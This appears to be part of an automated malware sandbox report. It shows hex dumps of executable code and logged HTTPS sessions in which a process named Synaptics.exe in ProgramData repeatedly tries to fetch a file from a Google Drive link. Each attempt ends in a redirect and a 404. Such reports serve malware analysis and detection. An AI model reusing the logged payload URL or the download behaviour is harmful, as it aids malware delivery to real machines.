                                                                                                                                                                            2024-12-30 10:48:41 UTC4096INData Raw: 00 e8 a6 a7 ff ff a3 3c e0 49 00 e8 84 a7 ff ff 25 00 00 00 80 3d 00 00 00 80 74 2d e8 73 a7 ff ff 25 ff 00 00 00 66 83 f8 04 76 0c c7 05 c0 e5 49 00 03 00 00 00 eb 20 e8 c7 a6 ff ff e8 86 fe ff ff a3 c0 e5 49 00 eb 0f e8 b6 a6 ff ff e8 75 fe ff ff a3 c0 e5 49 00 e8 2f a7 ff ff a3 34 e0 49 00 c3 90 ff 25 d0 02 4a 00 8b c0 ff 25 cc 02 4a 00 8b c0 ff 25 c8 02 4a 00 8b c0 ff 25 c4 02 4a 00 8b c0 50 6a 40 e8 e0 ff ff ff c3 8d 40 00 b8 10 00 00 00 c3 8b c0 53 e8 f2 ff ff ff 8b d8 85 db 74 36 83 3d c4 b0 49 00 ff 75 0a b8 e2 00 00 00 e8 79 dc ff ff 8b c3 e8 c6 ff ff ff 85 c0 75 0c b8 e2 00 00 00 e8 64 dc ff ff eb 0c 50 a1 c4 b0 49 00 50 e8 a2 ff ff ff 5b c3 8a 0d 64 e6 49 00 a1 c4 b0 49 00 84 c9 75 26 64 8b 15 2c 00 00 00 8b 04 82 c3 e8 9d ff ff ff a1 c4 b0 49
                                                                                                                                                                            Data Ascii: <I%=t-s%fvI IuI/4I%J%J%J%JPj@@St6=IuyudPIP[dIIu&d,I
                                                                                                                                                                            2024-12-30 10:48:41 UTC4096INData Raw: 4d 53 47 00 4d 53 48 5f 57 48 45 45 4c 53 55 50 50 4f 52 54 5f 4d 53 47 00 00 00 00 4d 53 48 5f 53 43 52 4f 4c 4c 5f 4c 49 4e 45 53 5f 4d 53 47 00 00 00 00 55 8b ec 33 c0 55 68 59 7c 40 00 64 ff 30 64 89 20 ff 05 78 e6 49 00 33 c0 5a 59 59 64 89 10 68 60 7c 40 00 c3 e9 e2 c6 ff ff eb f8 5d c3 8b c0 83 2d 78 e6 49 00 01 c3 55 8b ec 33 c0 55 68 91 7c 40 00 64 ff 30 64 89 20 ff 05 7c e6 49 00 33 c0 5a 59 59 64 89 10 68 98 7c 40 00 c3 e9 aa c6 ff ff eb f8 5d c3 8b c0 83 2d 7c e6 49 00 01 c3 68 e6 49 00 f0 ff 00 00 68 e6 49 00 f1 ff 00 00 68 e6 49 00 f2 ff 00 00 68 e6 49 00 f3 ff 00 00 68 e6 49 00 f4 ff 00 00 68 e6 49 00 f5 ff 00 00 68 e6 49 00 f6 ff 00 00 68 e6 49 00 f7 ff 00 00 68 e6 49 00 f8 ff 00 00 68 e6 49 00 f9 ff 00 00 68 e6 49 00 fa ff 00 00 68 e6 49
                                                                                                                                                                            Data Ascii: MSGMSH_WHEELSUPPORT_MSGMSH_SCROLL_LINES_MSGU3UhY|@d0d xI3ZYYdh`|@]-xIU3Uh|@d0d |I3ZYYdh|@]-|IhIhIhIhIhIhIhIhIhIhIhIhI
                                                                                                                                                                            2024-12-30 10:48:41 UTC4096INData Raw: 34 3e 40 00 2c 66 40 00 38 66 40 00 48 3e 40 00 3c 3e 40 00 48 66 40 00 a0 3b 40 00 ac ea 40 00 24 54 4d 75 6c 74 69 52 65 61 64 45 78 63 6c 75 73 69 76 65 57 72 69 74 65 53 79 6e 63 68 72 6f 6e 69 7a 65 72 8d 40 00 55 8b ec 53 89 d3 89 c2 c1 ea 10 66 f7 f3 8b 5d 08 66 89 01 66 89 13 5b 5d c2 04 00 53 8b d8 8b cb b2 01 a1 b0 86 40 00 e8 8b 45 00 00 e8 fe b6 ff ff 5b c3 53 56 57 8b f9 8b f2 8b d8 56 57 8b cb b2 01 a1 b0 86 40 00 e8 a7 45 00 00 e8 de b6 ff ff 5f 5e 5b c3 8b c0 ff 25 4c 08 4a 00 8b c0 55 8b ec 83 c4 f4 53 56 33 c9 89 4d fc 8b f2 8b d8 33 c0 55 68 15 8d 40 00 64 ff 30 64 89 20 56 8d 45 fc 8b d3 e8 1a c5 ff ff 8b 45 fc e8 22 c5 ff ff 50 e8 c0 ff ff ff e8 4f ed ff ff 85 c0 75 16 89 5d f4 c6 45 f8 0b 8d 55 f4 a1 d0 dc 49 00 33 c9 e8 7d ff ff ff
                                                                                                                                                                            Data Ascii: 4>@,f@8f@H>@<>@Hf@;@@$TMultiReadExclusiveWriteSynchronizer@USf]ff[]S@E[SVWVW@E_^[%LJUSV3M3Uh@d0d VEE"POu]EUI3}
                                                                                                                                                                            2024-12-30 10:48:41 UTC4096INData Raw: e8 3b 3f 00 00 3c 02 74 f2 8d 44 1e ff 5e 5b c3 33 c0 5e 5b c3 8d 40 00 53 56 57 55 8b f2 8b d8 8b c6 e8 59 b0 ff ff 8b f8 8b c3 e8 50 b2 ff ff 8b e8 85 ff 7e 28 8a 5c 3e ff 84 db 74 1b 8b d3 8b c5 e8 c5 04 00 00 85 c0 74 0e 8b d7 8b c6 e8 ec 3e 00 00 3c 02 75 06 4f 4f 85 ff 7f d8 8b c7 5d 5f 5e 5b c3 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 89 4d fc 8b fa 8b f0 33 c0 55 68 df 9c 40 00 64 ff 30 64 89 20 8b d6 b8 f8 9c 40 00 e8 81 ff ff ff 8b d8 85 db 74 07 80 7c 1e ff 2e 74 05 bb ff ff ff 7f 8d 45 f8 50 8b cb 49 ba 01 00 00 00 8b c6 e8 24 b2 ff ff 8b 55 f8 8b 45 fc 8b cf e8 03 b0 ff ff 33 c0 5a 59 59 64 89 10 68 e6 9c 40 00 8d 45 f8 e8 e2 ac ff ff c3 e9 5c a6 ff ff eb f0 5f 5e 5b 59 59 5d c3 00 00 00 ff ff ff ff 03 00 00 00 2e 5c 3a 00 53 56 57
                                                                                                                                                                            Data Ascii: ;?<tD^[3^[@SVWUYP~(\>tt><uOO]_^[@USVW3]M3Uh@d0d @t|.tEPI$UE3ZYYdh@E\_^[YY].\:SVW


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            1192.168.2.849714142.250.185.784438060C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:48:55 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-12-30 10:48:55 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:55 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-sJUKz-CGALDKxOe6862OgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            2192.168.2.849715142.250.185.784438060C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:48:55 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-12-30 10:48:55 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:55 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-k9l1oR496jW67Im9jn18Hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            3192.168.2.849721142.250.185.784438060C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:48:56 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-12-30 10:48:57 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:57 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-7rJ7VLoaIiIHOkuRTlJWsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            4192.168.2.849722142.250.185.784438060C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:48:56 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-12-30 10:48:57 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:57 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-8WcOyBUvcUC2op02lGvZvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            5192.168.2.849725142.250.185.1614438060C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:48:56 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            2024-12-30 10:48:57 UTC1594INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5CyZ8Ry0hRBMoQaKvjOLo-7dUnQ_6dON501F1RA2_qGz0yrgzbqh7k-I2fn4bIjLjb
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:57 GMT
                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-cLrC06TI7cTFmOMkCSw2tQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Set-Cookie: NID=520=O4iN5IOxf23kqpAqHJs_aF9KIEkavC4db8fvXtDOSh40Q7kbxnzU6nDxPE49KGn1Upx72cmG3NN0GTohw-johdvyQbL7l4JR3HuoUWf78GMDSGQhK9RxBNzIFRGHLMS8IY2iUnYPlfCloDF0QRl1r5wU1FU7L_3McvXp_ga72fpAgxvnLRCVeF0; expires=Tue, 01-Jul-2025 10:48:57 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:48:57 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 51 4b 5f 70 61 44 31 32 73 4a 6f 75 4e 46 49 79 58 6e 66 2d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lQK_paD12sJouNFIyXnf-g">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                                            2024-12-30 10:48:57 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            6192.168.2.849724142.250.185.1614438060C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:48:56 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            2024-12-30 10:48:57 UTC1594INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7H7WZEZC07BeG3AqwYLyv60wXpmpOrKsIFfFQqoHc4bY4Nymd1oFVU541EBay93MIr
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:57 GMT
                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-TinI2UiaYXj7SQbaaPqalQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Set-Cookie: NID=520=VC9Az_mxJ6FjsLomJdQOpKgQ4a1FhUiWGrzaZIMrw8k6urzaBLn7gtF1ACWlSJ8unr8PDR5SNcOe093vYylGPwpZvusWE7hocDA-7-p5uk-Flsh3bUQs_rlUzgEjafxKOB_oLSUQknDeVd8xqaAFKac_Rpc5-jpZSSFqffNXjgy_zxzFCv8KJUM; expires=Tue, 01-Jul-2025 10:48:57 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:48:57 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 6c 77 76 42 34 58 7a 31 5f 39 76 59 73 43 79 4e 69 64 50 74 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KlwvB4Xz1_9vYsCyNidPtw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                                            2024-12-30 10:48:57 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            7192.168.2.849729142.250.185.784438060C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:48:57 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-12-30 10:48:58 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:58 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-qvgvp2njoYf38IxshvPlpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            8192.168.2.849731142.250.185.1614438060C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:48:57 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            2024-12-30 10:48:58 UTC1594INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6iVXEp_BdGD8ayuHQebqLBYBGR6eoKetdqtcaKLn1RLrIB_ToziZx1YIZCCXjsdCJ3
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:58 GMT
                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
